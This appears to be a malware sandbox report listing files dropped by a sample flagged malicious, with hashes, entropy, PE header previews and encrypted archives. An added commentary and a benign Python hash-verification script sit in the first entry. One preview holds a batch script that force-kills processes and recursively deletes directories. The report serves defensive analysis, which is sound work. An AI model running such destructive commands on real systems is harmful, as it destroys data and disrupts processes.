                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
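This entry (and the five identical ones that follow, one per PowerShell start-up in the trace) is the marker file PowerShell itself writes to probe whether an AppLocker/WDAC lockdown policy is in force; it is benign start-up noise, which is why the report marks it Malicious:false, and it should not be treated as an indicator. Because its full content is visible, it is also a convenient check that the report's identity fields can be reproduced. The following is an added example, not part of the Joe Sandbox report: it recomputes Size, Entropy (8bit) (byte-wise Shannon entropy in bits per byte) and the hashes, and compares them with the values listed above. The 60th byte is assumed to be a trailing space, since the report gives 60 bytes with no line terminators while the visible text is 59 characters.

```python
import hashlib
import math
from collections import Counter

# Constructed from the Preview field above plus an assumed trailing space
# (60 bytes, "no line terminators" per the File Type field).
APPLOCKER_PROBE = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report entry above for the same file.
REPORTED = {
    "Size (bytes)": 60,
    "Entropy (8bit)": 4.038920595031593,
    "MD5": "D17FE0A3F47BE24A6453E9EF58C94641",
    "SHA1": "6AB83620379FC69F80C0242105DDFFD7D98D5D9D",
    "SHA-256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Byte-wise Shannon entropy, 0.0 (one byte value) to 8.0 (uniform), the
    quantity the report labels "Entropy (8bit)". Empty input is defined as 0.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Compute the identity fields the sandbox lists for a dropped file."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy_8bit(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify(data: bytes, reported: dict, entropy_tol: float = 1e-9) -> dict:
    """Field-by-field comparison, returning {field: matched}. Hashes compare
    case-insensitively; entropy within a tolerance because the report prints a float."""
    actual = describe(data)
    result = {}
    for field, want in reported.items():
        got = actual[field]
        if field == "Entropy (8bit)":
            result[field] = abs(got - want) <= entropy_tol
        elif isinstance(want, str):
            result[field] = got.upper() == want.upper()
        else:
            result[field] = got == want
    return result


if __name__ == "__main__":
    for field, ok in verify(APPLOCKER_PROBE, REPORTED).items():
        print(f"{field:15} {'match' if ok else 'MISMATCH'}")
```

The same describe() call works on any dropped file you have recovered from the sandbox VM, which is the quickest way to confirm you are looking at the artifact the report describes before spending time on it; the entropy helper also makes the "Encrypted" column meaningful, since packed or encrypted payloads sit near 8.0 while this text file sits near 4.0.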
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\file.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2989568
Entropy (8bit):6.518795012161611
Encrypted:false
SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
MD5:3799F4F2CFC27184CE70913F4EC3A8BE
SHA1:4424871CDFD4F9B4FB1039049A75844401A7C358
SHA-256:F95DF3026CF4EDCC3D334BFC20D188DE06EA4E4497E94C63504B2B783DC3E55E
SHA-512:F38B986C639EB2C676E0ECD9316CEA437934550D772F5494E2589626E826A5D23954398C3E4EB4584594E5E6CBEA28FFE195BEA27D2674F1A8119CA14EE869A0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......Q....@.................................W...k.............................1..............................-1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyzzfcwd..*.......*.................@...cnrltnzy.....@1......x-.............@....taggant.0...P1.."...|-.............@...........................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\file.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:unknown
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
                                                                                                                                                                                                                              Size (bytes):1679360
                                                                                                                                                                                                                              Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                              MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                              SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                              SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                              SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):468992
Entropy (8bit):6.157743912672224
Encrypted:false
SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:619F7135621B50FD1900FF24AADE1524
SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):222
Entropy (8bit):4.855194602218789
Encrypted:false
SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:68CECDF24AA2FD011ECE466F00EF8450
SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:false
Reputation:unknown
Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):2355713
Entropy (8bit):5.891648193754473
Encrypted:false
SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:579A63BEBCCBACAB8F14132F9FC31B89
SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
Category:dropped
Size (bytes):1799594
Entropy (8bit):7.99773141173711
Encrypted:true
SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
MD5:5659EBA6A774F9D5322F249AD989114A
SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v1.0 to extract, compression method=store
Category:dropped
Size (bytes):1799748
Entropy (8bit):7.997729415613798
Encrypted:true
SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
MD5:5404286EC7853897B3BA00ADF824D6C1
SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v1.0 to extract, compression method=store
Category:dropped
Size (bytes):1799902
Entropy (8bit):7.997726708945573
Encrypted:true
SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
MD5:5EB39BA3698C99891A6B6EB036CFB653
SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v1.0 to extract, compression method=store
Category:dropped
Size (bytes):1800056
Entropy (8bit):7.997723543142523
Encrypted:true
SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:7187CC2643AFFAB4CA29D92251C96DEE
SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v1.0 to extract, compression method=store
Category:dropped
Size (bytes):1800210
Entropy (8bit):7.997720745184939
Encrypted:true
SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:B7D1E04629BEC112923446FDA5391731
SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v1.0 to extract, compression method=store
Category:dropped
Size (bytes):1800364
Entropy (8bit):7.997716835838842
Encrypted:true
SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:0DC4014FACF82AA027904C1BE1D403C1
SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
Category:dropped
Size (bytes):3473559
Entropy (8bit):7.9992359395959935
Encrypted:true
SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1827328
Entropy (8bit):7.963282633529333
Encrypted:false
SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:83D75087C9BF6E4F07C36E550731CCDE
SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):3473725
Entropy (8bit):7.999948676888215
Encrypted:true
SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:false
Reputation:unknown

Process:C:\Windows\System32\cmd.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):3473725
Entropy (8bit):7.999948676888215
Encrypted:true
SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                              Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                              MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                              SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                              SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                              SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
